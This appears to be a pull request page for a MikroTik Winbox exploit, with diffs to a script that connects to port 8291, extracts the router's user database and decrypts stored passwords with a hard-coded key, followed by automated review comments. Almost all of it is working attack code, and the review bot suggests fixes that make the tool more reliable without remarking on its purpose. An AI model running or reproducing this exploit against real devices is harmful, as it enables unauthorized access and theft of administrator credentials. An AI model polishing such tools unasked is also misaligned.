PEP-8, python2 compatible and fix in decrypt_password function #4

Open
wants to merge 1 commit into
base: master
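--- a/WinboxExploit.py
+++ b/WinboxExploit.py
@@ -30,33 +30,34 @@
 0x00, 0x02, 0x00, 0x00, 0x00]
 
 
-
 if __name__ == "__main__":
-try:
-ip = sys.argv[1]
-except:
-print("Usage: python PoC.py [IP_ADDRESS]")
-
-#Initialize Socket
-s = socket.socket()
-s.settimeout(3)
-s.connect((ip, 8291))
-
-#Convert to bytearray for manipulation
-a = bytearray(a)
-b = bytearray(b)
-
-#Send hello and recieve the sesison id
-s.send(a)
-d = bytearray(s.recv(1024))
-
-#Replace the session id in template
-b[19] = d[38]
-
-#Send the edited response
-s.send(b)
-d = bytearray(s.recv(1024))
-
-#Get results
-print(ip)
-dump(d[55:])
+try:
+ip = sys.argv[1]
+except:
+print("Usage: python PoC.py [IP_ADDRESS]")
+exit(1)
+
+#Initialize Socket
+s = socket.socket()
+s.settimeout(3)
+s.connect((ip, 8291))
+
+#Convert to bytearray for manipulation
+a = bytearray(a)
+b = bytearray(b)
+
+#Send hello and recieve the sesison id
+s.send(a)
+d = bytearray(s.recv(1024))
+
+#Replace the session id in template
+b[19] = d[38]
+
+#Send the edited response
+s.send(b)
+d = bytearray(s.recv(1024))
+
+#Get results
+print("IP: %s" % ip)
+print('')
+dump(d[55:])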
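Review bot: The bare `except:` around the new `ip = sys.argv[1]` still catches SystemExit and KeyboardInterrupt along with the missing-argument case, and the added `exit(1)` relies on the site-installed builtin; `except IndexError:` followed by `sys.exit(1)` is the intended check, and `sys` is evidently already imported since `sys.argv` is used on the line above. The two `s.recv(1024)` results are indexed (`b[19] = d[38]`, `dump(d[55:])`) with no length check, so a short or empty reply from the peer becomes an IndexError traceback instead of a clear message; a guard such as `if len(d) <= 38: sys.exit("unexpected reply length")` before the assignment would make that failure explicit. The socket is also never closed; `s.close()` after the last `recv` (or `contextlib.closing(socket.socket())`) keeps the descriptor from outliving the script when it is imported or extended.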
23 changes: 14 additions & 9 deletions extract_user.py
@@ -1,16 +1,19 @@
#!/usr/bin/env python3

import sys, hashlib
import sys
import hashlib


def decrypt_password(user, pass_enc):
key = hashlib.md5(user + b"283i4jfkai3389").digest()

passw = ""
for i in range(0, len(pass_enc)):
passw += chr(pass_enc[i] ^ key[i % len(key)])
passw += chr(pass_enc[i] ^ ord(key[i % len(key)]))

return passw.split("\x00")[0]


def extract_user_pass_from_entry(entry):
user_data = entry.split(b"\x01\x00\x00\x21")[1]
pass_data = entry.split(b"\x11\x00\x00\x21")[1]
Expand All @@ -23,8 +26,8 @@ def extract_user_pass_from_entry(entry):

return username, password

def get_pair(data):

def get_pair(data):
user_list = []

entries = data.split(b"M2")[1:]
Expand All @@ -35,18 +38,20 @@ def get_pair(data):
continue

pass_plain = decrypt_password(user, pass_encrypted)
user = user.decode("ascii")
user = user.decode("ascii")

user_list.append((user, pass_plain))

return user_list


def dump(data):
user_pass = get_pair(data)
for u, p in user_pass:
print("User:", u)
print("Pass:", p)
print()
print("User: %s" % u)
print("Pass: %s" % p)
print('')


if __name__ == "__main__":
if len(sys.argv) == 2:
Expand All @@ -55,7 +60,7 @@ def dump(data):
else:
user_file = open(sys.argv[1], "rb").read()
dump(user_file)

else:
print("Usage:")
print("\tFrom file: \t", sys.argv[0], "user.dat")
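Review bot: The new `ord(key[i % len(key)])` in decrypt_password (first hunk) raises TypeError on Python 3, where `hashlib.md5(...).digest()` is bytes and indexing it already yields an int, so under the unchanged `#!/usr/bin/env python3` shebang the function no longer runs; `ord()` is only valid when the digest is a Python 2 str. Converting both operands once makes indexing yield ints on either interpreter without the call: `key = bytearray(hashlib.md5(user + b"283i4jfkai3389").digest())`, `pass_enc = bytearray(pass_enc)`, then the original `passw += chr(pass_enc[i] ^ key[i % len(key)])`. That conversion also covers the Python 2 case where `pass_enc[i]` would otherwise be a one-character str and the XOR would fail on that side instead.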